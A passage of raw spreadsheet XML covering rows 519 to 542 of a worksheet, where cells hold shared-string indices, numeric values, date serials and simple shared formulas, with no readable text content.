      <c r="B519" s="2" t="s">
        <v>2458</v>
      </c>
      <c r="C519" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D519" s="2" t="s">
        <v>2453</v>
      </c>
      <c r="E519" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F519" s="1" t="s">
        <v>2459</v>
      </c>
      <c r="G519" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H519" s="1" t="s">
        <v>2460</v>
      </c>
      <c r="I519" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J519" s="1" t="s">
        <v>2455</v>
      </c>
      <c r="K519" s="2" t="s">
        <v>2456</v>
      </c>
      <c r="L519" s="1">
        <v>3.0</v>
      </c>
      <c r="M519" s="1">
        <v>5.0</v>
      </c>
      <c r="N519" s="1" t="s">
        <v>433</v>
      </c>
      <c r="O519" s="1" t="s">
        <v>2457</v>
      </c>
      <c r="P519" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q519" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R519" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S519" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="1">
        <v>7581.0</v>
      </c>
      <c r="B520" s="2" t="s">
        <v>2461</v>
      </c>
      <c r="C520" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D520" s="2" t="s">
        <v>2453</v>
      </c>
      <c r="E520" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F520" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G520" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H520" s="1" t="s">
        <v>2462</v>
      </c>
      <c r="I520" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J520" s="1" t="s">
        <v>2455</v>
      </c>
      <c r="K520" s="2" t="s">
        <v>2456</v>
      </c>
      <c r="L520" s="1">
        <v>3.0</v>
      </c>
      <c r="M520" s="1">
        <v>5.0</v>
      </c>
      <c r="N520" s="1" t="s">
        <v>2463</v>
      </c>
      <c r="O520" s="1" t="s">
        <v>2457</v>
      </c>
      <c r="P520" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q520" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R520" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S520" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="1">
        <v>7582.0</v>
      </c>
      <c r="B521" s="2" t="s">
        <v>2464</v>
      </c>
      <c r="C521" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D521" s="2" t="s">
        <v>2453</v>
      </c>
      <c r="E521" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F521" s="1" t="s">
        <v>652</v>
      </c>
      <c r="G521" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H521" s="1" t="s">
        <v>2465</v>
      </c>
      <c r="I521" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J521" s="1" t="s">
        <v>2455</v>
      </c>
      <c r="K521" s="2" t="s">
        <v>2456</v>
      </c>
      <c r="L521" s="1">
        <v>3.0</v>
      </c>
      <c r="M521" s="1">
        <v>5.0</v>
      </c>
      <c r="N521" s="1" t="s">
        <v>700</v>
      </c>
      <c r="O521" s="1" t="s">
        <v>2457</v>
      </c>
      <c r="P521" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q521" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R521" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S521" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="1">
        <v>7583.0</v>
      </c>
      <c r="B522" s="2" t="s">
        <v>2466</v>
      </c>
      <c r="C522" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D522" s="2" t="s">
        <v>2453</v>
      </c>
      <c r="E522" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F522" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G522" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H522" s="1" t="s">
        <v>2467</v>
      </c>
      <c r="I522" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J522" s="1" t="s">
        <v>2455</v>
      </c>
      <c r="K522" s="2" t="s">
        <v>2456</v>
      </c>
      <c r="L522" s="1">
        <v>3.0</v>
      </c>
      <c r="M522" s="1">
        <v>5.0</v>
      </c>
      <c r="N522" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O522" s="1" t="s">
        <v>2457</v>
      </c>
      <c r="P522" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q522" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R522" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S522" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="1">
        <v>7657.0</v>
      </c>
      <c r="B523" s="2" t="s">
        <v>2468</v>
      </c>
      <c r="C523" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D523" s="2" t="s">
        <v>2469</v>
      </c>
      <c r="E523" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F523" s="1" t="s">
        <v>2470</v>
      </c>
      <c r="G523" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H523" s="4">
        <v>44566.72083333333</v>
      </c>
      <c r="I523" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J523" s="1" t="s">
        <v>2471</v>
      </c>
      <c r="K523" s="2" t="s">
        <v>2472</v>
      </c>
      <c r="L523" s="1">
        <v>2.0</v>
      </c>
      <c r="M523" s="1">
        <v>4.0</v>
      </c>
      <c r="N523" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O523" s="1" t="s">
        <v>2473</v>
      </c>
      <c r="P523" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q523" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R523" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S523" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="1">
        <v>7658.0</v>
      </c>
      <c r="B524" s="2" t="s">
        <v>2474</v>
      </c>
      <c r="C524" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D524" s="2" t="s">
        <v>2469</v>
      </c>
      <c r="E524" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F524" s="1" t="s">
        <v>2475</v>
      </c>
      <c r="G524" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H524" s="4">
        <v>44566.731944444444</v>
      </c>
      <c r="I524" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J524" s="1" t="s">
        <v>2471</v>
      </c>
      <c r="K524" s="2" t="s">
        <v>2472</v>
      </c>
      <c r="L524" s="1">
        <v>2.0</v>
      </c>
      <c r="M524" s="1">
        <v>4.0</v>
      </c>
      <c r="N524" s="1" t="s">
        <v>360</v>
      </c>
      <c r="O524" s="1" t="s">
        <v>2473</v>
      </c>
      <c r="P524" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q524" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R524" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S524" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="1">
        <v>7659.0</v>
      </c>
      <c r="B525" s="2" t="s">
        <v>2476</v>
      </c>
      <c r="C525" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D525" s="2" t="s">
        <v>2469</v>
      </c>
      <c r="E525" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F525" s="1" t="s">
        <v>2470</v>
      </c>
      <c r="G525" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H525" s="4">
        <v>44566.78055555555</v>
      </c>
      <c r="I525" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J525" s="1" t="s">
        <v>2471</v>
      </c>
      <c r="K525" s="2" t="s">
        <v>2472</v>
      </c>
      <c r="L525" s="1">
        <v>2.0</v>
      </c>
      <c r="M525" s="1">
        <v>4.0</v>
      </c>
      <c r="N525" s="1" t="s">
        <v>2477</v>
      </c>
      <c r="O525" s="1" t="s">
        <v>2473</v>
      </c>
      <c r="P525" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q525" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R525" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S525" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="1">
        <v>7660.0</v>
      </c>
      <c r="B526" s="2" t="s">
        <v>2478</v>
      </c>
      <c r="C526" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D526" s="2" t="s">
        <v>2469</v>
      </c>
      <c r="E526" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F526" s="1" t="s">
        <v>2475</v>
      </c>
      <c r="G526" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H526" s="4">
        <v>44717.65416666667</v>
      </c>
      <c r="I526" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J526" s="1" t="s">
        <v>2471</v>
      </c>
      <c r="K526" s="2" t="s">
        <v>2472</v>
      </c>
      <c r="L526" s="1">
        <v>2.0</v>
      </c>
      <c r="M526" s="1">
        <v>4.0</v>
      </c>
      <c r="N526" s="1" t="s">
        <v>2479</v>
      </c>
      <c r="O526" s="1" t="s">
        <v>2473</v>
      </c>
      <c r="P526" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q526" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R526" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S526" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="1">
        <v>7972.0</v>
      </c>
      <c r="B527" s="2" t="s">
        <v>2480</v>
      </c>
      <c r="C527" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D527" s="2" t="s">
        <v>2481</v>
      </c>
      <c r="E527" s="2" t="s">
        <v>2110</v>
      </c>
      <c r="F527" s="1" t="s">
        <v>145</v>
      </c>
      <c r="G527" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H527" s="4">
        <v>44683.81875</v>
      </c>
      <c r="I527" s="1" t="s">
        <v>2482</v>
      </c>
      <c r="J527" s="1" t="s">
        <v>2483</v>
      </c>
      <c r="K527" s="2" t="s">
        <v>2484</v>
      </c>
      <c r="L527" s="1">
        <v>3.0</v>
      </c>
      <c r="M527" s="1">
        <v>7.0</v>
      </c>
      <c r="N527" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O527" s="1" t="s">
        <v>2485</v>
      </c>
      <c r="P527" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q527" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R527" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S527" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="1">
        <v>8068.0</v>
      </c>
      <c r="B528" s="2" t="s">
        <v>626</v>
      </c>
      <c r="C528" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D528" s="2" t="s">
        <v>2486</v>
      </c>
      <c r="E528" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F528" s="1" t="s">
        <v>629</v>
      </c>
      <c r="G528" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H528" s="1" t="s">
        <v>2487</v>
      </c>
      <c r="I528" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J528" s="1" t="s">
        <v>2488</v>
      </c>
      <c r="K528" s="2" t="s">
        <v>2489</v>
      </c>
      <c r="L528" s="1">
        <v>1.0</v>
      </c>
      <c r="M528" s="1">
        <v>1.0</v>
      </c>
      <c r="N528" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O528" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P528" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q528" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R528" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S528" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="1">
        <v>8069.0</v>
      </c>
      <c r="B529" s="2" t="s">
        <v>2490</v>
      </c>
      <c r="C529" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D529" s="2" t="s">
        <v>2491</v>
      </c>
      <c r="E529" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F529" s="1" t="s">
        <v>2492</v>
      </c>
      <c r="G529" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H529" s="4">
        <v>43987.90347222222</v>
      </c>
      <c r="I529" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J529" s="1" t="s">
        <v>2493</v>
      </c>
      <c r="K529" s="2" t="s">
        <v>2494</v>
      </c>
      <c r="L529" s="1">
        <v>5.0</v>
      </c>
      <c r="M529" s="1">
        <v>8.0</v>
      </c>
      <c r="N529" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O529" s="1" t="s">
        <v>2495</v>
      </c>
      <c r="P529" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q529" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R529" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S529" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="1">
        <v>8070.0</v>
      </c>
      <c r="B530" s="2" t="s">
        <v>2496</v>
      </c>
      <c r="C530" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D530" s="2" t="s">
        <v>2491</v>
      </c>
      <c r="E530" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F530" s="1" t="s">
        <v>2497</v>
      </c>
      <c r="G530" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H530" s="4">
        <v>43987.90625</v>
      </c>
      <c r="I530" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J530" s="1" t="s">
        <v>2493</v>
      </c>
      <c r="K530" s="2" t="s">
        <v>2494</v>
      </c>
      <c r="L530" s="1">
        <v>5.0</v>
      </c>
      <c r="M530" s="1">
        <v>8.0</v>
      </c>
      <c r="N530" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O530" s="1" t="s">
        <v>2495</v>
      </c>
      <c r="P530" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q530" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R530" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S530" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="1">
        <v>8074.0</v>
      </c>
      <c r="B531" s="2" t="s">
        <v>2498</v>
      </c>
      <c r="C531" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D531" s="2" t="s">
        <v>2491</v>
      </c>
      <c r="E531" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F531" s="1" t="s">
        <v>2499</v>
      </c>
      <c r="G531" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H531" s="4">
        <v>44017.191666666666</v>
      </c>
      <c r="I531" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J531" s="1" t="s">
        <v>2493</v>
      </c>
      <c r="K531" s="2" t="s">
        <v>2494</v>
      </c>
      <c r="L531" s="1">
        <v>5.0</v>
      </c>
      <c r="M531" s="1">
        <v>8.0</v>
      </c>
      <c r="N531" s="1" t="s">
        <v>2500</v>
      </c>
      <c r="O531" s="1" t="s">
        <v>2495</v>
      </c>
      <c r="P531" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q531" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R531" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S531" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="1">
        <v>8088.0</v>
      </c>
      <c r="B532" s="2" t="s">
        <v>2501</v>
      </c>
      <c r="C532" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D532" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="E532" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F532" s="1" t="s">
        <v>1782</v>
      </c>
      <c r="G532" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H532" s="4">
        <v>44142.64097222222</v>
      </c>
      <c r="I532" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J532" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="K532" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="L532" s="1">
        <v>3.0</v>
      </c>
      <c r="M532" s="1">
        <v>8.0</v>
      </c>
      <c r="N532" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O532" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="P532" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q532" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R532" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S532" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="1">
        <v>8089.0</v>
      </c>
      <c r="B533" s="2" t="s">
        <v>2506</v>
      </c>
      <c r="C533" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D533" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="E533" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F533" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G533" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H533" s="4">
        <v>44142.83125</v>
      </c>
      <c r="I533" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J533" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="K533" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="L533" s="1">
        <v>3.0</v>
      </c>
      <c r="M533" s="1">
        <v>8.0</v>
      </c>
      <c r="N533" s="1" t="s">
        <v>2507</v>
      </c>
      <c r="O533" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="P533" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q533" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R533" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S533" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="1">
        <v>8090.0</v>
      </c>
      <c r="B534" s="2" t="s">
        <v>2508</v>
      </c>
      <c r="C534" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D534" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="E534" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F534" s="1" t="s">
        <v>1782</v>
      </c>
      <c r="G534" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H534" s="4">
        <v>44172.135416666664</v>
      </c>
      <c r="I534" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J534" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="K534" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="L534" s="1">
        <v>3.0</v>
      </c>
      <c r="M534" s="1">
        <v>8.0</v>
      </c>
      <c r="N534" s="1" t="s">
        <v>2509</v>
      </c>
      <c r="O534" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="P534" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q534" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R534" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S534" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="1">
        <v>8091.0</v>
      </c>
      <c r="B535" s="2" t="s">
        <v>2510</v>
      </c>
      <c r="C535" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D535" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="E535" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F535" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G535" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H535" s="4">
        <v>44172.80347222222</v>
      </c>
      <c r="I535" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J535" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="K535" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="L535" s="1">
        <v>3.0</v>
      </c>
      <c r="M535" s="1">
        <v>8.0</v>
      </c>
      <c r="N535" s="1" t="s">
        <v>2511</v>
      </c>
      <c r="O535" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="P535" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q535" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R535" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S535" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="1">
        <v>8092.0</v>
      </c>
      <c r="B536" s="2" t="s">
        <v>2512</v>
      </c>
      <c r="C536" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D536" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="E536" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F536" s="1" t="s">
        <v>1782</v>
      </c>
      <c r="G536" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H536" s="1" t="s">
        <v>2513</v>
      </c>
      <c r="I536" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J536" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="K536" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="L536" s="1">
        <v>3.0</v>
      </c>
      <c r="M536" s="1">
        <v>8.0</v>
      </c>
      <c r="N536" s="1" t="s">
        <v>2514</v>
      </c>
      <c r="O536" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="P536" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q536" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R536" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S536" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="1">
        <v>8093.0</v>
      </c>
      <c r="B537" s="2" t="s">
        <v>2515</v>
      </c>
      <c r="C537" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D537" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="E537" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F537" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G537" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H537" s="1" t="s">
        <v>2516</v>
      </c>
      <c r="I537" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J537" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="K537" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="L537" s="1">
        <v>3.0</v>
      </c>
      <c r="M537" s="1">
        <v>8.0</v>
      </c>
      <c r="N537" s="1" t="s">
        <v>2517</v>
      </c>
      <c r="O537" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="P537" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q537" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R537" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S537" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="1">
        <v>8094.0</v>
      </c>
      <c r="B538" s="2" t="s">
        <v>2518</v>
      </c>
      <c r="C538" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D538" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="E538" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F538" s="1" t="s">
        <v>2519</v>
      </c>
      <c r="G538" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H538" s="1" t="s">
        <v>2520</v>
      </c>
      <c r="I538" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J538" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="K538" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="L538" s="1">
        <v>3.0</v>
      </c>
      <c r="M538" s="1">
        <v>8.0</v>
      </c>
      <c r="N538" s="1" t="s">
        <v>2521</v>
      </c>
      <c r="O538" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="P538" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q538" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R538" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S538" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="1">
        <v>8095.0</v>
      </c>
      <c r="B539" s="2" t="s">
        <v>2522</v>
      </c>
      <c r="C539" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D539" s="2" t="s">
        <v>2502</v>
      </c>
      <c r="E539" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F539" s="1" t="s">
        <v>1782</v>
      </c>
      <c r="G539" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H539" s="4">
        <v>43839.01527777778</v>
      </c>
      <c r="I539" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J539" s="1" t="s">
        <v>2503</v>
      </c>
      <c r="K539" s="2" t="s">
        <v>2504</v>
      </c>
      <c r="L539" s="1">
        <v>3.0</v>
      </c>
      <c r="M539" s="1">
        <v>8.0</v>
      </c>
      <c r="N539" s="1" t="s">
        <v>2523</v>
      </c>
      <c r="O539" s="1" t="s">
        <v>2505</v>
      </c>
      <c r="P539" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q539" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R539" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S539" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="1">
        <v>8099.0</v>
      </c>
      <c r="B540" s="2" t="s">
        <v>2524</v>
      </c>
      <c r="C540" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D540" s="2" t="s">
        <v>2525</v>
      </c>
      <c r="E540" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F540" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G540" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H540" s="1" t="s">
        <v>2526</v>
      </c>
      <c r="I540" s="1" t="s">
        <v>2301</v>
      </c>
      <c r="J540" s="1" t="s">
        <v>2527</v>
      </c>
      <c r="K540" s="2" t="s">
        <v>2528</v>
      </c>
      <c r="L540" s="1">
        <v>4.0</v>
      </c>
      <c r="M540" s="1">
        <v>7.0</v>
      </c>
      <c r="N540" s="1" t="s">
        <v>2529</v>
      </c>
      <c r="O540" s="1" t="s">
        <v>2530</v>
      </c>
      <c r="P540" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q540" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R540" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S540" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="1">
        <v>8103.0</v>
      </c>
      <c r="B541" s="2" t="s">
        <v>2531</v>
      </c>
      <c r="C541" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D541" s="2" t="s">
        <v>2532</v>
      </c>
      <c r="E541" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F541" s="1" t="s">
        <v>2533</v>
      </c>
      <c r="G541" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H541" s="1" t="s">
        <v>2534</v>
      </c>
      <c r="I541" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J541" s="1" t="s">
        <v>2535</v>
      </c>
      <c r="K541" s="2" t="s">
        <v>2536</v>
      </c>
      <c r="L541" s="1">
        <v>3.0</v>
      </c>
      <c r="M541" s="1">
        <v>3.0</v>
      </c>
      <c r="N541" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O541" s="1" t="s">
        <v>2537</v>
      </c>
      <c r="P541" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q541" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R541" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S541" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="1">
        <v>8104.0</v>
      </c>
      <c r="B542" s="2" t="s">
        <v>2538</v>
      </c>
      <c r="C542" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D542" s="2" t="s">
        <v>2532</v>
      </c>
      <c r="E542" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F542" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G542" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H542" s="1" t="s">
        <v>2539</v>
      </c>
      <c r="I542" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J542" s="1" t="s">
        <v>2535</v>
      </c>
      <c r="K542" s="2" t="s">
        <v>2536</v>
      </c>
